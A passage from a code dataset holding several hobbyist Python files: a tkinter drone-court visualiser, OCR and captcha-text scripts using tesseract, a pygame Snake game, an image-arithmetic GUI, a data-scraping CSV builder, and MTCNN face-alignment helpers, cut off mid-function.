self.tree_pos = [] # tree coordinate\n self._get_12tree_coor()\n\n #layout and fixed\n self._set_layout()\n self._draw_court_fixed()\n\n #screenshot save and read\n self.url = '/Users/yuhu/Desktop/01.png'\n\n def startrandom(self):\n self.randombutton['state'] = tk.DISABLED\n self.stopbutton['state'] = tk.NORMAL\n self.randomflag = True\n\n self.t1 = threading.Thread(target=self._startrandom)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def stoprandom(self):\n\n self.stopbutton['state'] = tk.DISABLED\n self.randombutton['state'] = tk.NORMAL\n self.randomflag = False\n\n def confirmcourt(self):\n self.confirmbutton['state'] = tk.DISABLED\n if self.getter():\n img = Image.open(self.url)\n img.show()\n\n\n def _set_layout(self):\n self.frame.pack(side=tk.BOTTOM)\n self.randombutton.pack(side=tk.LEFT, expand=tk.NO, anchor=tk.S)\n self.confirmbutton.pack(side=tk.RIGHT, expand=tk.NO, anchor=tk.S)\n self.stopbutton.pack(side=tk.RIGHT, expand=tk.NO, anchor=tk.S)\n self.canvas.pack(side=tk.TOP)\n\n\n\n def _startrandom(self):\n while(self.randomflag):\n time.sleep(self.randomfreq)\n self.randomcourt.random()\n self.canvas.delete('delete')\n self._canvas_update()\n\n def _canvas_update(self):\n\n #draw top court\n for i in self.randomcourt.pos_with_tree[5:]:\n self._draw_tree_base_on_pos(i, color='red')\n for j in self.randomcourt.tree_with_code:\n self._draw_tree_base_on_pos(j, color='pink')\n\n self._draw_sequence_base_on_pos()\n\n\n def _draw_court_fixed(self):\n self.canvas.create_rectangle(0, 0, 1.2 * self.coef, 1.2 * self.coef, fill='yellow')\n self.canvas.create_text(0.6 * self.coef, 0.6 * self.coef, text='H')\n self.canvas.create_rectangle(WIDTH - 1.2 * self.coef, 0, WIDTH, 1.2 * self.coef, fill='yellow')\n self.canvas.create_text(WIDTH - 0.6 * self.coef, 0.6 * self.coef, text='H')\n self.canvas.create_line(0, 0.375 * HEIGHT - 3, WIDTH, 0.375 * HEIGHT - 3, fill='blue', width=3)\n self.canvas.create_rectangle(WIDTH / 2 - 0.6 * self.coef, HEIGHT, WIDTH / 2 + 0.6 * self.coef,\n HEIGHT - 1.2 * self.coef, fill='yellow')\n self.canvas.create_text(WIDTH / 2, HEIGHT - 0.6 * self.coef, text='0')\n\n for i in range(9):\n self.canvas.create_line(0, (0.0625 * (9 - i) + 0.375) * HEIGHT, WIDTH,\n (0.0625 * (9 - i) + 0.375) * HEIGHT, dash=(2, 2))\n\n for i in range(5):\n self.canvas.create_line((i + 1) * WIDTH * 0.2, 0.375 * HEIGHT, (i + 1) * WIDTH * 0.2, HEIGHT, dash=(2, 2))\n\n def _draw_sequence_base_on_pos(self):\n\n def get_outer_rec(num_y, pos_x): # num_y 1-9 pos_x 0-4\n left_top_x = pos_x * WIDTH * 0.2\n left_top_y = (0.0625 * (9 - num_y) + 0.375) * HEIGHT\n right_bot_x = left_top_x + 0.2 * WIDTH\n right_bot_y = left_top_y + 0.0625 * HEIGHT\n return left_top_x, left_top_y, right_bot_x, right_bot_y\n\n def get_inner_drawing_square(x1, y1, x2, y2):\n rec_size = (y2 - y1) * 0.80\n left_top_x = x1 + ((x2 - x1) - rec_size) / 2\n left_top_y = y1 * 0.9 + y2 * 0.1\n return (left_top_x, left_top_y, left_top_x + rec_size, left_top_y + rec_size), rec_size\n\n\n for i in range(9): # 9 rows i = 0~8\n x_1, y_1, x_2, y_2 = get_outer_rec(i + 1, self.randomcourt.pos_to_put[i])\n drawing_square, inner_size = get_inner_drawing_square(x_1, y_1, x_2, y_2)\n if self.randomcourt.parking_or_hoop[i] == 'parking':\n self.canvas.create_rectangle(drawing_square, fill='yellow', tags=('delete'))\n else:\n self.canvas.create_oval(drawing_square, tags=('delete'))\n self.canvas.create_text(drawing_square[0] + inner_size / 2,\n drawing_square[1] + inner_size / 2, text=str(i+1), tags=('delete'))\n\n def _draw_tree_base_on_pos(self, pos, color='pink'):\n self.canvas.create_oval(self.tree_pos[pos], fill=color, dash=(4, 4), tags=('delete'))\n tree_rectangle = (self.tree_pos[pos][0] + self.coef * 0.75, self.tree_pos[pos][1],\n self.tree_pos[pos][0] + self.coef * 1.25, self.tree_pos[pos][1] - self.coef / 2)\n self.canvas.create_rectangle(tree_rectangle, fill=color, tags=('delete'))\n\n def _get_12tree_coor(self):\n\n def get_one_tree_coor(x_left, y_top):\n rad = 1 * self.coef\n return x_left * self.coef, y_top * self.coef, x_left * self.coef + 2 * rad, y_top * self.coef + 2 * rad\n\n tree_0 = get_one_tree_coor(2.5, 1.5)\n self.tree_pos.append(tree_0)\n tree_1 = get_one_tree_coor(5, 1.5)\n self.tree_pos.append(tree_1)\n tree_2 = get_one_tree_coor(8.5, 1.5)\n self.tree_pos.append(tree_2)\n tree_3 = get_one_tree_coor(11.5, 1.5)\n self.tree_pos.append(tree_3)\n\n tree_4 = get_one_tree_coor(1.5, 5) # ??\n self.tree_pos.append(tree_4)\n tree_5 = get_one_tree_coor(5, 5)\n self.tree_pos.append(tree_5)\n tree_6 = get_one_tree_coor(8.5, 5)\n self.tree_pos.append(tree_6)\n tree_7 = get_one_tree_coor(12, 5)\n self.tree_pos.append(tree_7)\n\n tree_8 = get_one_tree_coor(1.5, 8.5)\n self.tree_pos.append(tree_8)\n tree_9 = get_one_tree_coor(5, 8.5)\n self.tree_pos.append(tree_9)\n tree_10 = get_one_tree_coor(8.5, 8.5)\n self.tree_pos.append(tree_10)\n tree_11 = get_one_tree_coor(12, 8.5)\n self.tree_pos.append(tree_11)\n\n def getter(self):\n x = (self.root.winfo_rootx() + self.canvas.winfo_x()) * 2\n y = self.root.winfo_rooty() + self.canvas.winfo_y()\n x1 = x+WIDTH * 2\n y1 = y * 2 + HEIGHT * 2\n print('x is {}'.format(x))\n print('y is {}'.format(y))\n print('x1 is {}'.format(x1))\n print('y1 is {}'.format(y1))\n ImageGrab.grab((x, y, x1, y1)).save(self.url)\n return 1\n\n\n\nif __name__ == '__main__':\n\n a = RandomCourt()\n for _ in range(5):\n a.ran_print()\n\n\n a = Window()\n a.root.mainloop()\n\n\n","sub_path":"drone_court.py","file_name":"drone_court.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"400752175","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pytesseract\nimport os\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport cv2\nfrom PIL import Image\nfrom difflib import SequenceMatcher\nimport sys\n\n\ndef main():\n \n im = Image.open(\"CV/img/questionImage.png\")\n \n img=cv2.imread(\"CV/img/questionImage.png\")\n cv2.imshow(\"Question\",img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n #print(\"Recognizing text...\\n\")\n texto = pytesseract.image_to_string(im)\n \n #print(texto)\n \n problema=\"\"\n for i in range(len(texto)):\n if texto[i]=='a' and texto[i+1]==')':\n break\n else:\n if texto[i]=='\\n':\n problema+=\" \"\n else:\n problema+=texto[i] \n\n \n f = open(\"outputs/problem.txt\", \"w\")\n f.write(problema)\n f.close()\n \nif __name__ == '__main__':\n\tmain()\n \n\n\n","sub_path":"CV/OCR/basicOCR.py","file_name":"basicOCR.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610382567","text":"# imports\nimport pygame\nimport sys\nimport random\nimport math\nimport pygame\n\n# window size\nWIDTH = 600\nHEIGHT = 600\n\n# declaring global variables\nx_pos = 120\ny_pos = 280\nlength = 3\nrunning = True\ntail = []\ndirection = 'RIGHT'\nfoodSize = 20\nsnakeBlockSize = 35\ngridBlock = 40\nscore = 0\nfoodPos = (200, 200)\nfoodOnMap = False\n\n\n# creates list of possible positions of food\n# consists of values of products in \"40 gangern\"\npossiblePos = [x for x in range(0, WIDTH-gridBlock) if x % gridBlock == 0]\n\n# Frames pr second\nFPS = 8\n\n# initialize pygame\npygame.init()\ncanvas = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('SNAKE')\n\n# initilize text\npygame.font.init()\nfontBig = pygame.font.SysFont('Comic Sans MS', 80)\nfontSmall = pygame.font.SysFont('Comic Sans MS', 50)\n\n# creates a clock\nclock = pygame.time.Clock()\n\n# create grid (for demonstrational purposes)\n\"\"\" for i in range(0, WIDTH, 40):\n for m in range(0,WIDTH, 40):\n pygame.draw.rect(canvas, (255,255,255), (i,m,snakeBlockSize,snakeBlockSize),1) \"\"\"\n\n\n# function to initialize snake\ndef initializeSnake(x, y):\n print('initilizing')\n for i in range(0, length):\n tail.append({'x': x-i*40, 'y': y})\n pygame.draw.rect(canvas, (255, 255, 255),\n (tail[i]['x'], tail[i]['y'], snakeBlockSize, snakeBlockSize))\n\n\n# initialize snake at start position\ninitializeSnake(x_pos, y_pos)\n\n\n# function to create food\ndef createFood():\n global foodOnMap\n global foodPos\n global possiblePos\n\n # update scoretext\n scoreTxt = fontBig.render(str(score), False, (255, 255, 255))\n canvas.blit(scoreTxt, (10, 10))\n\n # if no food on screen, make new food\n if not foodOnMap:\n # create foodposition in center of each grid block 40x40\n foodPos = (random.choice(possiblePos)+(snakeBlockSize - foodSize)/2,\n random.choice(possiblePos)+(snakeBlockSize-foodSize)/2)\n foodOnMap = True\n pygame.draw.rect(canvas, (255, 0, 0),\n (foodPos[0], foodPos[1], foodSize, foodSize))\n\n\n# function to be called if snake eats food\ndef eatFood():\n global score\n global length\n global foodOnMap\n\n # updates variables\n foodOnMap = False\n score += 1\n length += 1\n\n # add block to snake\n tail.append({'x': tail[-1]['x'], 'y': tail[-1]['y']})\n\n\n# create snake\ndef drawSnake(dir):\n global x_pos\n global y_pos\n global gridBlock\n\n # draw background color to blank the screen\n canvas.fill((0, 0, 0))\n\n # create new food\n createFood()\n\n # check current direction and update snake position\n if (dir == 'LEFT'):\n x_pos -= gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n elif (dir == 'RIGHT'):\n x_pos += gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n elif (dir == 'UP'):\n y_pos -= gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n elif (dir == 'DOWN'):\n y_pos += gridBlock\n tail.insert(0, {'x': x_pos, 'y': y_pos})\n tail.pop()\n\n # draw updated snake\n for i in range(0, length):\n pygame.draw.rect(canvas, (255, 255, 255),\n (tail[i]['x'], tail[i]['y'], snakeBlockSize, snakeBlockSize))\n\n # skip first block of the snake\n if i == 0:\n continue\n\n # check if snake collides with tail\n if (collide(tail[0]['x'], tail[i]['x'], tail[0]['y'], tail[i]['y'], snakeBlockSize, snakeBlockSize, snakeBlockSize, snakeBlockSize)):\n quitGame()\n\n # check if snake collides with food\n if (collide(tail[0]['x'], foodPos[0], tail[0]['y'], foodPos[1], snakeBlockSize, foodSize, snakeBlockSize, foodSize)):\n eatFood()\n\n # check if snake collides with walls\n if (tail[0]['x'] > WIDTH-snakeBlockSize or tail[0]['x'] < 0 or tail[0]['y'] > HEIGHT-snakeBlockSize or tail[0]['y'] < 0):\n quitGame()\n\n\n# function to quit and pause game\ndef quitGame():\n global running\n\n # display game over text\n quitText = fontBig.render('Game over', False, (255, 0, 0))\n scoreTxt = fontSmall.render('Score: ' + str(score), False, (255, 0, 0))\n infoTxt = fontSmall.render('Press enter to retry',False, (255,255,255))\n canvas.blit(quitText, (WIDTH/2 - quitText.get_rect().width/2, HEIGHT/2-60))\n canvas.blit(scoreTxt, (WIDTH/2 - scoreTxt.get_rect().width/2, HEIGHT/2+20))\n canvas.blit(infoTxt, (WIDTH/2 - infoTxt.get_rect().width/2, HEIGHT/2+80))\n\n running = False\n\n\n# function to check if two objects collide\n# returns boolean\ndef collide(x1, x2, y1, y2, w1, w2, h1, h2):\n if (x1+w1 > x2 and x1 < x2+w2 and y1+h1 > y2 and y1 < y2+h2):\n return True\n else:\n return False\n\n\n# function to reset game\ndef resetGame():\n global running\n global tail\n global score\n global length\n global x_pos\n global y_pos\n global direction\n global foodOnMap\n\n # draw background color to blank the screen\n canvas.fill((0, 0, 0))\n\n # reset variables for new game\n tail = []\n foodOnMap = False\n length = 3\n score = 0\n x_pos = 120\n y_pos = 280\n direction = 'RIGHT'\n\n # initialize snake at start position\n initializeSnake(x_pos, y_pos)\n\n running = True\n\n\n# function to pause game\ndef pauseGame():\n global running\n running = False\n \n # display pause text\n pauseTxt = fontBig.render('PAUSED', False, (255, 255, 255))\n canvas.blit(pauseTxt, (WIDTH/2 - pauseTxt.get_rect().width/2, HEIGHT/2))\n\n\n# function to resume game\ndef resumeGame():\n global running\n running = True\n\n\n# game loop\nwhile True:\n # if game is running\n if running:\n clock.tick(FPS)\n # draw new snake for every fps\n drawSnake(direction)\n\n # listen for key events\n for e in pygame.event.get():\n if e.type == pygame.KEYDOWN:\n if (e.key == pygame.K_LEFT and direction != 'RIGHT'):\n direction = 'LEFT'\n elif (e.key == pygame.K_RIGHT and direction != 'LEFT'):\n direction = 'RIGHT'\n elif (e.key == pygame.K_UP and direction != 'DOWN'):\n direction = 'UP'\n elif (e.key == pygame.K_DOWN and direction != 'UP'):\n direction = 'DOWN'\n elif (e.key == pygame.K_p):\n pauseGame()\n\n if e.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n # game is not running, freeze game\n else:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if (event.key == pygame.K_RETURN):\n resetGame()\n elif (e.key == pygame.K_p):\n resumeGame()\n if event.type == pygame.QUIT:\n pygame.quit()\n\n pygame.display.flip()\n","sub_path":"Game/Snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"178474460","text":"import tkinter as tk\nfrom tkinter import Canvas, filedialog as fd\nfrom tkinter.constants import NONE\nfrom PIL import Image,ImageTk\nimport cv2 as cv\nimport numpy as np\n#调用库函数\n\nwin=tk.Tk()\nwin.title('实验二')\nwin.geometry('1024x1024')\n#建立窗口\nclass PictureProcessor(): \n def selectPicture(self):\n pic_name = fd.askopenfilename(title='选择图片', filetypes=[('jpg','png'), ('All Files', '*')])\n return pic_name\n def add_together(self,r_a,r_b):\n image_add=np.add(r_a,r_b) \n cv.imwrite('add.png',image_add)\n path_add='add.png'\n return path_add\n def subtract_together(self,r_a,r_b):\n image_subtract=np.subtract(r_a,r_b)\n cv.imwrite('subtract.png',image_subtract) \n path_subtract='subtract.png'\n return path_subtract \n def multiply_together(self,r_a,r_b):\n image_multiply=np.multiply(r_a,r_b)\n cv.imwrite('multiply.png',image_multiply)\n path_multiply='multiply.png'\n return path_multiply\n def divide_together(self,r_a,r_b):\n image_divide=np.divide(r_a,r_b)\n cv.imwrite('divide.png',image_divide)\n path_divide='divide.png'\n return path_divide \n #图片处理过程\nclass PictureProcessorPro(PictureProcessor):\n def update_resized_image(self,image,canvas_width,canvas_height):\n scale = min([1.0 * canvas_width / image.width, 1.0 * canvas_height / image.height])\n image_width = int(image.width * scale)\n image_height = int(image.height * scale)\n scaled = image.resize((image_width, image_height), Image.ANTIALIAS)\n return scaled\n #适应画布大小等比缩放\n def pic_select_a(self): \n global path_a \n #若需在方法中调用图片,则需提前声明全局变量\n path_a=self.selectPicture()\n image_a=Image.open(path_a)\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_a,200,200))\n l_a.image = image\n l_a.create_image(100, 100, image=image, anchor=tk.CENTER)\n #选择图片a并显示\n def pic_select_b(self): \n global path_b\n path_b=self.selectPicture() \n image_b=Image.open(path_b)\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_b,200,200))\n l_b.image = image\n l_b.create_image(100, 100, image=image, anchor=tk.CENTER)\n #选择图片b并显示\n def pic_add(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_add=Image.open(self.add_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_add,200,200))\n l_add.image = image\n l_add.create_image(100, 100, image=image, anchor=tk.CENTER)\n #图片相加并显示\n def pic_subtract(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_subtract=Image.open(self.subtract_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_subtract,200,200))\n l_subtract.image = image\n l_subtract.create_image(100, 100, image=image, anchor=tk.CENTER)\n #图片相减并显示\n def pic_multiply(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_multiply=Image.open(self.multiply_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_multiply,200,200))\n l_multiply.image = image\n l_multiply.create_image(100, 100, image=image, anchor=tk.CENTER)\n #图片相乘并显示\n def pic_divide(self):\n r_a=cv.imread(path_a)\n r_b=cv.imread(path_b)\n image_divide=Image.open(self.divide_together(r_a,r_b))\n image = ImageTk.PhotoImage(image=self.update_resized_image(image_divide,200,200))\n l_divide.image = image\n l_divide.create_image(100, 100, image=image, anchor=tk.CENTER)\n #图片相除并显示\nclass Frame():\n def frame(self):\n global l_a,l_b,l_add,l_subtract,l_multiply,l_divide\n canvas_width=200\n canvas_height=200\n\n l_a=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_a.grid(row=2,column=1,padx=20, pady=20)\n\n l_b=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_b.grid(row=2,column=2,padx=20, pady=20)\n\n l_add=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_add.grid(row=4,column=1,padx=20, pady=20)\n\n l_subtract=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_subtract.grid(row=4,column=2,padx=20, pady=20)\n\n l_multiply=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_multiply.grid(row=4,column=3,padx=20, pady=20)\n\n l_divide=Canvas(win,width=canvas_width,height=canvas_height,bg='white')\n l_divide.grid(row=4,column=4,padx=20, pady=20)\n #图片显示布局\n picture=PictureProcessorPro()\n botton1=tk.Button(win,text='选择图片a',width=10,height=2,command=picture.pic_select_a)\n botton1.grid(row=1,column=1)\n\n botton2=tk.Button(win,text='选择图片b',width=10,height=2,command=picture.pic_select_b)\n botton2.grid(row=1,column=2)\n\n botton3=tk.Button(win,text='图片相加',width=10,height=2,command=picture.pic_add)\n botton3.grid(row=3,column=1)\n\n botton4=tk.Button(win,text='图片相减',width=10,height=2,command=picture.pic_subtract)\n botton4.grid(row=3,column=2)\n\n botton5=tk.Button(win,text='图片相乘',width=10,height=2,command=picture.pic_multiply)\n botton5.grid(row=3,column=3)\n\n botton6=tk.Button(win,text='图片相除',width=10,height=2,command=picture.pic_divide)\n botton6.grid(row=3,column=4)\n #按钮布局\n\ndef main():\n frame1=Frame()\n frame1.frame()\n #调用frame方法完成布局 \n win.mainloop()\nif __name__ == '__main__':\n main()","sub_path":"图片四则运算/arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"525633624","text":"#%%\n# IMPORTS\nimport pandas as pd\nimport sys\nfrom pathlib import Path\n\nfrom asset_scraping.un_scraper.un_scraper.scrapy_results.base_json import base_json\n\n\n#%%\n# LOGGING\nimport logging\nlogger = logging.getLogger()\nlogger.handlers = []\n\n# Set Level\nlogger.setLevel(logging.DEBUG)\n\n# Create Formatter\nFORMAT = \"%(asctime)s %(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s\"\nDATE_FMT = \"%Y-%m-%d %H:%M:%S\"\nformatter = logging.Formatter(FORMAT, DATE_FMT)\n\n# Create Handler and Assign\nhandler = logging.StreamHandler(sys.stderr)\nhandler.setFormatter(formatter)\nlogger.handlers = [handler]\nlogger.critical(\"Logging started\")\n\n#%%\n# Create a local directory in which you will store the final CSV\n# Assert it exists\nPATH_BASE = Path(\"~/desktop/wb_data\").expanduser()\nassert PATH_BASE.exists()\n\n#%%\n# import asset list & asset sizes list from get_asset_lengths\nfrom asset_scraping.un_scraper.un_scraper.get_asset_lengths import url_lists\nfrom asset_scraping.un_scraper.un_scraper.get_asset_lengths import all_asset_sizes_list\n\n#%%\n\nfor i in url_lists:\n print(len(i))\n\nfor j in all_asset_sizes_list:\n print(len(j))\n\n\n#%%\n# ADD INDIVIDUAL FILE URLS TO DICTIONARY\n# Make sure base_json is imported\n\ndef create_dict_add_urls():\n\n b = 0\n while b < len(base_json):\n for dictionary1 in base_json:\n print(dictionary1)\n\n # try:\n # del dictionary1['file[2]url']\n # except KeyError:\n # continue\n a = 0\n while a < len(url_lists[b]):\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"url\"] = url_lists[b][a]\n logging.info(\"add {} to dictionary\".format(url_lists[b][a]))\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"contentLength\"] = all_asset_sizes_list[b][a]\n logging.info(\"add {} to dictionary\".format(all_asset_sizes_list[b][a]))\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"checksum\"] = 0\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"checksumType\"] = \"\"\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"compression\"] = \"\"\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"resourceId\"] = a\n\n dictionary1[\"files\" + \"[\" + str(a) + \"]:\" + \"index\"] = a\n\n a += 1\n\n b += 1\n\n\ncreate_dict_add_urls()\n\n#%%\n# SEE WHAT BASE JSON looks like\n\nprint(base_json)\n#%%\n# Delete file[2]url (old list of urls in dictionaries)\n\nfor dict1 in base_json:\n del dict1['file[2]url']\n\n\n#%%\n# Make Dictionary for Pandas\npandas_dict = {}\n\n\ndef create_dict():\n b = 0\n while b < len(base_json):\n\n short_term_dict = base_json[b]\n\n pandas_dict[base_json[b][\"name\"]] = short_term_dict\n\n b += 1\n\n logging.info(\"added {} datasets to dict\".format(len(pandas_dict)))\n print(pandas_dict)\n\n\ncreate_dict()\n\n#%%\n# STORE LOCALLY\n\n\ndef create_pd_store_locally():\n meta_pd = pd.DataFrame.from_dict(data=pandas_dict, orient='columns')\n print(meta_pd)\n\n file_name = 'un_data_test.csv'\n meta_pd.to_csv(PATH_BASE / file_name)\n logging.info(\"stored {} in {} directory\".format(file_name, PATH_BASE))\n\n\ncreate_pd_store_locally()\n","sub_path":"asset_scraping/un_scraper/un_scraper/create_csv.py","file_name":"create_csv.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"215954717","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport tesserocr\nfrom PIL import Image\n\nimage = Image.open('捷顺停车/code.jpg')\nimage = image.convert('L')\nthreshold = 60\ntable = []\nfor i in range(256):\n\tif i < threshold:\n\t\ttable.append(0)\n\telse:\n\t\ttable.append(1)\nimage = image.point(table, '1')\n# image.show()\nresult = tesserocr.image_to_text(image)\nprint(result)\nprint(tesserocr.tesseract_version())\nprint(tesserocr.get_languages())","sub_path":"验证码识别.py","file_name":"验证码识别.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137771105","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nfrom detection.mtcnn import detect_face\nimport matplotlib.pyplot as plt\n\n\ndefault_color = (0, 255, 0) #BGR\ndefault_thickness = 2\n\n\n\n\n\ndef calculate_degree(pt1,pt2):\n \"\"\"Calculates the the angle that corresponds to the slope of the line connecing pt1 to pt2.\n \n Args:\n pt1 ((x,y) or [x,y]): Coordinate of the first point.\n pt2 ((x,y) or [x,y]): Coordinate of the second point.\n \n Returns:\n float: angle\n \"\"\"\n \n pt1,pt2 = np.array(pt1), np.array(pt2)\n pt1, pt2 = pt1[:], pt2[:]\n dx = (pt1[0] - pt2[0])\n dy = (pt1[1] - pt2[1])\n angle = np.degrees(np.arctan2(dy, dx)) - 180\n return angle\n\n\ndef display_point(img, point):\n \"\"\"Displays a point on an image without changing the original image.\n \n Args:\n img (nd-array): Image as a numpy array.\n point ((x,y) or [x,y]): Coordinate of the point.\n \n Returns:\n nd-array: Mutated image with the point on it.\n \"\"\"\n img = img.copy()\n point = (point[0], point[1])\n cv2.circle(img, center=point, radius=1, color=default_color, thickness=default_thickness)\n plt.imshow(img)\n plt.show()\n return img\ndef display_box(img, box):\n \"\"\"Displays a rectangle on an image without changing the original image.\n \n Args:\n img (nd-array): Image as a numpy array.\n box (nd-array): Array of shape 2*2 [[x1,y1], [x2,y2]], where x1,y1 represent the point \n to the lower left corner of the rectangle, and [x2,y2] represent upper-right one.\n \n Returns:\n nd-array: Mutated image with the box shown.\n \"\"\"\n box = box.astype('int32')\n #box should have (x,y) coords stacked vertically\n img = img.copy()\n cv2.rectangle(img, (box[0,0], box[0,1]), (box[1,0], box[1,1]), color=default_color, thickness=default_thickness)\n plt.imshow(img)\n plt.show()\n return img\n\ndef scale_box(box, scale):\n \"\"\"Scales a rectangle by a ratio.\n \n Args:\n box (nd-array): Array of shape 2*2 [[x1,y1], [x2,y2]], where x1,y1 represent the point \n to the lower left corner of the rectangle, and [x2,y2] represent upper-right one.\n scale (float): Ratio to which the box is scaled.\n \n Returns:\n (nd-array): 2*2 Array with the same properties as box argument.\n \"\"\"\n #upper left and lower-right as (x,y) stacked vertically\n center = np.mean(box,axis=0).astype('int32')\n h = abs(box[0,1] - box[1,1]) * scale\n w = abs(box[0,0] - box[1,0]) * scale\n return np.array([[center[0]-w//2, center[1] - h//2], [center[0] + w//2, center[1] + h//2]]).astype('int32')\n \ndef safe_crop(img, box):\n \"\"\"Crops an image with handling out of bound coordinates based on a rectangular area.\n \n Args:\n img (nd-array): Image as a numpy array. \n box (nd-array): Array of shape 2*2 [[x1,y1], [x2,y2]], where x1,y1 represent the point \n to the lower left corner of the rectangle, and [x2,y2] represent upper-right one.\n Returns:\n (nd-array): Cropped image.\n \"\"\"\n h, w = img.shape[0], img.shape[1]\n \n # box is invalid:\n if box[0,0] > box[1,0] or box[0,1] > box[1,1]:\n return None\n # coords are beyond image boundaries:\n box[0,0] = 0 if box[0,0] < 0 else box[0,0]\n box[0,0] = w if box[0,0] > w else box[0,0]\n box[1,0] = 0 if box[1,0] < 0 else box[1,0]\n box[1,0] = w if box[1,0] > w else box[1,0]\n box[0,1] = 0 if box[0,1] < 0 else box[0,1]\n box[0,1] = h if box[0,1] > h else box[0,1]\n box[1,1] = 0 if box[1,1] < 0 else box[1,1]\n box[1,1] = w if box[1,1] > h else box[1,1]\n return img[box[0,1]:box[1,1], box[0,0]:box[1,0]]\n\ndef apply_affine(points, transformation):\n \"\"\"Applies an affine transformation (like the output of cv2.getRotationMatrix2D) on a vector or matrix.\n \n Args:\n points (nd-array): Array of form [[x1,y1], [x2,y2], ...] stacked vertically.\n transformation (nd-array): A 2*3 affine transformation matrix.\n \n Returns:\n (nd-array): Points under the influence of the transformation, with the same format as input.\n \"\"\"\n return ((np.dot(transformation[:,:2], points.reshape(-1, 2).T) + transformation[:,2].reshape(2,1)).T).astype('int32')\n\ndef scale_points(points,img_source, img_dest):\n \"\"\"Scales points of source image to correspond to their position in destination.\n \n Args:\n points (nd-array): Array of form [[x1,y1], [x2,y2], ...] stacked vertically.\n img_source (nd-array): Image to which points belong.\n img_dest (nd-array): Destination image.\n \n Retruns:\n (nd-array): corresponding postions of points in form [[x1,y1], [x2,y2], ...] stacked vertically.\n \"\"\"\n \n h_scale = img_dest.shape[0] / img_source.shape[0]\n w_scale = img_dest.shape[1] / img_source.shape[1]\n return (points * np.array([w_scale, h_scale]).reshape(1,2)).astype('int32')\n\n\n\nclass FaceExtractor:\n def __init__(self, minsize=20, threshold=[ 0.7, 0.7, 0.9], factor=0.71):\n with tf.Graph().as_default():\n self.sess = tf.Session()\n self.pnet, self.rnet, self.onet = detect_face.create_mtcnn(self.sess, None)\n self.mtcnn_img_size = (250,250)\n self.minsize = minsize # minimum size of face\n self.threshold = threshold # three steps's threshold\n self.factor = factor # scale factor\n def extract_faces(self, img):\n \"\"\"Detects faces in an image, and aligns them based on their eyes position.\n \n Args:\n img (nd-array): numpy array representing an image.\n \n Returns:\n (list): A list containing nd-arrays each representing an aligned face.\n \n \"\"\"\n original_image = img.copy()\n height, width = original_image.shape[:2] # image shape has 3 dimensions\n \n # mtcnn requires images to be at the size of about 250*250\n resized_img = cv2.resize(img, self.mtcnn_img_size)\n \n # mtcnn returns 5 points for each face it detects in an array of 10 [x1,...,x5,y1,...,y5].T form\n # note that the points array is vertical\n # bounding_boxes is in the form of [x1,y1,x2,y2,conf] for each face stacked vertically in an nd-array\n bounding_boxes, points = detect_face.detect_face(resized_img, self.minsize, self.pnet, \\\n self.rnet, self.onet, self.threshold, self.factor)\n \n # we transform all the points to be in [x,y] format\n # list of five points for each face (the first two points are eyes)\n faces_xy = [face.reshape(2,5).T for face in points.T]\n \n # list of 2*2 arrays of form nd-array[[x1,y1], [x2,y2]] with points specifing coreners of rectangle\n faces_boxes = [box[:4].reshape(2,2) for box in bounding_boxes.astype('int32')]\n \n \n \n # angle of the slope of the line connecting two eyes for each face\n angle = [calculate_degree(face_points[0], face_points[1]) for face_points in faces_xy]\n \n \n # iterating through the faces aligning, rescaling and cropping\n cropped_faces = []\n for i in range(len(faces_boxes)):\n \n original_face_points = scale_points(faces_xy[i], resized_img, original_image)\n # getting rotation matrix around eyes_center without scaling\n# rotation_mat = cv2.getRotationMatrix2D(eyes_centers[i], angle[i], 1.0)\n \n # the box coordinates in the original image\n original_box = 